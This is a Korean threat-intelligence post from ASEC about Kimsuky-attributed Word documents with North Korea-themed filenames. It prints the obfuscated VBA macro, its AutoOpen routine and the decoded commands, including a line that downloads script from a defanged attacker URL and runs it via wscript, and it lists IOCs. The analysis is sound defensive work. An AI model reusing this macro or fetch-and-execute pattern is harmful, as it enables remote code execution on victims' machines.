Posted By ASEC , 2022년 4월 27일

외교/안보 관련 내용의 워드문서 유포 중

ASEC 분석팀은 대북 관련 파일명으로 악성 워드 문서가 지속적으로 유포되고 있음을 확인하였다.

[그림 1] 220426-북한의 외교정책과 우리의 대응방향(정**박사).doc

워드 문서에는 악성 VBA 매크로 코드가 포함되어 있으며 <대북 관련 본문 내용 악성 워드의 지속 유포 정황 확인>에서 소개한 문서 파일과 동일한 유형으로 확인된다. 최근 유포가 확인된 워드 문서의 파일명은 다음과 같다.

220426-북한의 외교정책과 우리의 대응방향(정**박사).doc (4/26)
북한의 외교정책과 우리의 대응방향.doc (4/26)
중국의 외교정책과 우리의 대응방향.doc (4/22)
보도자료-원코리아국제포럼 2022 -20220422.docm (4/23)
[분석자료] 4.25 열병식을 통해 본 북한의 핵무력 사용 입장과 군부 엘리트 변동의 함의.docm (4/26)

확인된 매크로 코드에는 특정 URL에 접속하여 받아온 데이터를 실행하는 코드가 포함되어 있다. ‘북한의 외교정책과 우리의 대응방향.doc’ 파일에서 확인된 매크로 코드에는 다음과 같이 난독화된 문자열이 존재한다.

Function Unpck(idx)
    sa = Array("pi^c$", "wi^n$m~g^mts^:w^in@3^2_$pro~ces`s", "1q^a$z~2^wsx^", "On^ $E~r^ror^ R^es@u^me$ Ne~xt:`Set@ m@x $= ^Cr^ea`teO`b`je~ct^(`""~Mi^cro^so~ft$.X`MLH$TT`P""~):`mx^.op$en@ ""`GE@T`"",` ^""~h^tt`p:/$/g0`0gl`edr^iv^e`.^myw@eb^com`mu~nit$y@.o~rg`/f^il~e~/up^lo`ad^/li`st$.p`h^p?$qu`ery$=^1""~, F$al@se~:mx$.S`end@:$Ex$e@cu`te(`mx.^re$spo`ns~eT`ex^t)", "\v^e$r~s^ion^.i^ni@", "ws^c$r~i^pt.^ex^e @/^/e$:vb~scr`ipt@ /@/b$ ")
    Key = "@  $ ~ ` ^"
    s = sa(idx)
    arrkey = Split(Key)
    For Each k In arrkey
        s = Replace(s, k, "")
    Next
    Unpck = s
End Function

난독화된 문자열은 워드 문서 실행 시 자동으로 실행되는 AutoOpen() 함수에 의해 사용되며 디코딩된 문자열은 다음과 같다.

Sub AutoOpen()
    On Error Resume Next
    sn = Denor(0) 'pic
    Set wm = GetObject(Denor(1)) 'winmgmts:win32_process
    pw = Denor(2) '1qaz2wsx
    Weed sn, pw
    Present
    Set wnd = ActiveDocument
    wnd.Save
    cnt = Denor(3) 'On Error Resume Next:Set mx = CreateObject("Microsoft.XMLHTTP"):mx.open "GET", "hxxp://g00gledrive.mywebcommunity[.]org/file/upload/list.php?query=1", False:mx.Send:Execute(mx.responseText)
    pth = Templates(1).Path & Denor(4) '\version.ini
    ResContent pth, cnt
    wm.Create Denor(5) & pth 'wscript.exe //e:vbscript //b 
End Sub

해당 매크로에도 <대북 관련 본문 내용 악성 워드의 지속 유포 정황 확인>에서 확인되었던 문서보호 해제와 관련된 코드가 존재한다. 설정된 비밀번호 역시 1qaz2wsx 를 사용하고 있어 동일한 공격자가 제작한 것으로 추정된다.

이후 %AppData%\Microsoft\Templates\ 폴더에 version.ini 파일을 생성한다. ini 파일 내부에는 다음과 같이 특정 URL에서 받아온 데이터를 실행하는 명령이 포함되어있다. 접속 URL에 list.php?query=1 가 포함되는 것 또한 해당 유형의 특징이다.

On Error Resume Next:
Set mx = CreateObject("Microsoft.XMLHTTP"):
mx.open "GET", "hxxp://g00gledrive.mywebcommunity[.]org/file/upload/list.php?query=1", False:
mx.Send:
Execute(mx.responseText)

생성된 ini 파일은 다음 명령어를 통해 실행된다.

wscript.exe //e:vbscript //b %AppData%\Microsoft\Templates\version.ini

현재 URL에 접속이 불가하여 이후 행위는 확인이 불가하지만 wscript.exe 실행 인자가 <탄소배출 전문기업 타겟 워드문서 공격>에서 확인된 명령어와 동일한 것으로 보아 이와 유사하게 사용자 PC 정보 유출 등의 행위가 수행되었을 것으로 추정된다.

해당 악성코드를 제작하는 것으로 추정되는 공격 그룹은 대북 관련 내용으로 악성 워드 문서를 지속적으로 유포하고 있어 관련 사용자들의 주의가 필요하다. 사용자는 출처가 불분명한 이메일의 첨부파일 실행 및 매크로 사용을 자제해야 한다.

현재 V3에서는 해당 악성코드를 다음과 같이 진단하고 있다.

[파일진단]
Downloader/DOC.Kimsuky

[IOC]
657b538698483f43aada2e5e4bc4a91d (VBA)
cb2a18028055cdf1582c1c5ac3756203 (VBA)
0a0f858beeb6914aaf07896b7790a1d4 (VBA)
hxxp://g00gledrive.mywebcommunity[.]org/file/upload/list.php?query=1
hxxp://impartment.myartsonline[.]com/file/upload/list.php?query=1

연관 IOC 및 관련 상세 분석 정보는 안랩의 차세대 위협 인텔리전스 플랫폼 ‘AhnLab TIP’ 구독 서비스를 통해 확인 가능하다.